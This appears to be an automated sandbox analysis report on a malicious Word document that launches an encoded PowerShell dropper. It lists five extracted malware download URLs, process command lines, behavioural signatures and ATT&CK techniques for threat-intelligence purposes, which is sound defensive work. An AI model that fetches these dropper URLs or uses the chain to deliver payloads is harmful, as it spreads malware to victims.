Analysis

  • max time kernel: 144s
  • resource: win7v191014
  • submitted: 07-01-2020 04:51

General

  • Target: 2019_04___REC_0370426885276201___9643537570004881753.doc
  • Sample: 200107-ygwfzyy35j
  • SHA256: e8ca6c66c79cca9404a9f6a6920ff02010dc799435381a97fd5c57cf0c3abb41

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Source: URLs
  • exe.dropper URLs:
    • http://xoso.thememanga.com/wp-admin/rqr/
    • http://nuochoakichduc.info/wp-admin/HbS7j/
    • http://nhasachthanhduy.com/master.class/zrJd/
    • http://saphonzee.com/wp-includes/WdGrn8/
    • https://tripaxi.com/All/Og86/

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Modifies registry class 136 IoCs
  • Modifies system certificate store 2 TTPs 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE (PID: 2036)
    Command line: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2019_04___REC_0370426885276201___9643537570004881753.doc"
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Drops file in System32 directory
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 1108)
    Command line: powershell -e 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
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion
    • Install Root Certificate (T1130): 1
    • Modify Registry (T1112): 1


Downloads

  • memory/2036-0-0x00000000062B0000-0x00000000062B4000-memory.dmp (Filesize: 16KB)
  • memory/2036-1-0x00000000063CC000-0x00000000063D0000-memory.dmp (Filesize: 16KB)
  • memory/2036-2-0x0000000008F90000-0x0000000008F94000-memory.dmp (Filesize: 16KB)
  • memory/2036-3-0x00000000063CC000-0x00000000063D0000-memory.dmp (Filesize: 16KB)
  • memory/2036-5-0x0000000002020000-0x0000000002021000-memory.dmp (Filesize: 4KB)